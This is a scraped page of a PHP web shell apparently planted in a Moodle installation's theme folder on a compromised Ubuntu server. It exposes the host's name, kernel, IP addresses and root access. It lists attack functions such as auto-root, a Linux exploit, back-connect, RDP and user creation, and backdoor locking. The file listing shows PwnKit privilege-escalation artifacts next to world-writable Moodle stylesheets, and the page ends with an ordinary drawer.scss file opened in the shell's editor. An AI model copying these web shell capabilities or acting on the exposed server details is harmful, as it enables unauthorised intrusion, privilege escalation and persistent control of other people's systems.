Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
theme /
boost /
scss /
moodle /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
admin.scss
12.49
KB
-rwxrwxrwx
atto.scss
4.23
KB
-rwxrwxrwx
backup-restore.scss
4.16
KB
-rwxrwxrwx
blocks.scss
8.18
KB
-rwxrwxrwx
bootstrap-rtl.scss
793
B
-rwxrwxrwx
bootswatch.scss
174
B
-rwxrwxrwx
bs2-compat.scss
1.26
KB
-rwxrwxrwx
bs4alphacompat.scss
6.22
KB
-rwxrwxrwx
buttons.scss
1.8
KB
-rwxrwxrwx
calendar.scss
12.58
KB
-rwxrwxrwx
chat.scss
2.25
KB
-rwxrwxrwx
contentbank.scss
2.7
KB
-rwxrwxrwx
core.scss
49.99
KB
-rwxrwxrwx
course.scss
23.64
KB
-rwxrwxrwx
dashboard.scss
144
B
-rwxrwxrwx
debug.scss
1.78
KB
-rwxrwxrwx
drawer.scss
3.93
KB
-rwxrwxrwx
editor.scss
62
B
-rwxrwxrwx
expendable.scss
826
B
-rwxrwxrwx
filemanager.scss
19.94
KB
-rwxrwxrwx
forms.scss
10.96
KB
-rwxrwxrwx
grade.scss
8.92
KB
-rwxrwxrwx
icons.scss
2.28
KB
-rwxrwxrwx
layout.scss
733
B
-rwxrwxrwx
login.scss
167
B
-rwxrwxrwx
message.scss
16.13
KB
-rwxrwxrwx
modal.scss
389
B
-rwxrwxrwx
modules.scss
36.88
KB
-rwxrwxrwx
popover-region.scss
9.93
KB
-rwxrwxrwx
print.scss
312
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
question.scss
12.37
KB
-rwxrwxrwx
reports.scss
550
B
-rwxrwxrwx
search.scss
1.28
KB
-rwxrwxrwx
sticky-footer.scss
403
B
-rwxrwxrwx
tables.scss
1.38
KB
-rwxrwxrwx
templates.scss
238
B
-rwxrwxrwx
tool_usertours.scss
3.42
KB
-rwxrwxrwx
undo.scss
7.73
KB
-rwxrwxrwx
user.scss
5.09
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : drawer.scss
/* Anchor link offset fix. This makes hash links scroll 60px down to account for the fixed header. */ $fixed-header-y: $navbar-height; $drawer-width: 285px !default; $drawer-padding-x: 20px !default; $drawer-padding-y: 20px !default; $drawer-offscreen-gutter: 20px !default; :target { scroll-margin-top: $fixed-header-y + 10px; } .pagelayout-embedded :target { padding-top: initial; margin-top: initial; } #nav-drawer.closed { left: -($drawer-width + $drawer-offscreen-gutter); } #nav-drawer[aria-hidden=true] .list-group-item { display: none; } /* Use a variable for the drawer background colors. */ $drawer-bg: darken($body-bg, 5%) !default; [data-region="drawer"] { position: fixed; width: $drawer-width; top: $fixed-header-y; height: calc(100% - #{$navbar-height}); overflow-y: auto; -webkit-overflow-scrolling: touch; z-index: $zindex-dropdown - 1; background-color: $drawer-bg; -webkit-transition: right 0.5s ease, left 0.5s ease; -moz-transition: right 0.5s ease, left 0.5s ease; transition: right 0.5s ease, left 0.5s ease; } @include media-breakpoint-up(sm) { [data-region="drawer"] { padding: $drawer-padding-x $drawer-padding-y; } } #nav-drawer { right: auto; left: 0; /* Override the z-indexes defined in bootstrap/_list-group.scss that lead to side effects on the user tours positioning. */ .list-group-item-action.active, .list-group-item.active { z-index: inherit; } .list-group-item-action.active + .list-group-item, .list-group-item.active + .list-group-item { border-top: none; } .list-group { // Remove default list styling in nav menus. ul { list-style: none; padding: 0; margin: 0; } // Add margin to be consistent with `.list-group-item` spacing. li { margin-bottom: -1px; } li:last-child { margin-bottom: 0; } } } #page { margin-top: $fixed-header-y; } .pagelayout-embedded #page { margin-top: 0; } body.drawer-ease { -webkit-transition: margin-left 0.5s ease, margin-right 0.5s ease; -moz-transition: margin-left 0.5s ease, margin-right 0.5s ease; transition: margin-left 0.5s ease, margin-right 0.5s ease; } body.drawer-open-left { @include media-breakpoint-up(md) { margin-left: $drawer-width; } } body.drawer-open-right { @include media-breakpoint-up(md) { margin-right: $drawer-width; } } $right-drawer-width: 320px; [data-region=right-hand-drawer] { display: flex; flex-direction: column; @include transition(right .2s ease-in-out); &.drawer { z-index: $zindex-sticky; position: fixed; top: $navbar-height; right: 0; height: calc(100% - #{$navbar-height}); width: $right-drawer-width; box-shadow: -2px 2px 4px rgba(0, 0, 0, .08); padding: 0; visibility: visible; opacity: 1; } .closewidget { display: none; } &.hidden { display: block; right: $right-drawer-width * -1; // Turn off visibility so that nothing in the drawer can receive focus when // it is hidden. visibility: hidden; opacity: 0; // Delay visibility changes until after the slide right animation has completed. @include transition(right .2s ease-in-out, visibility 0s ease-in-out .2s, opacity 0s ease-in-out .2s); } } @include media-breakpoint-down(sm) { [data-region=right-hand-drawer] { &.drawer { top: 0; height: 100%; z-index: $zindex-fixed; } .closewidget { display: block; padding: 0 0.2rem; } } body.drawer-open-left, body.drawer-open-right { overflow: hidden; } } .dir-rtl { [data-region=right-hand-drawer] { box-shadow: 2px 2px 4px rgba(0, 0, 0, .08); } }
Close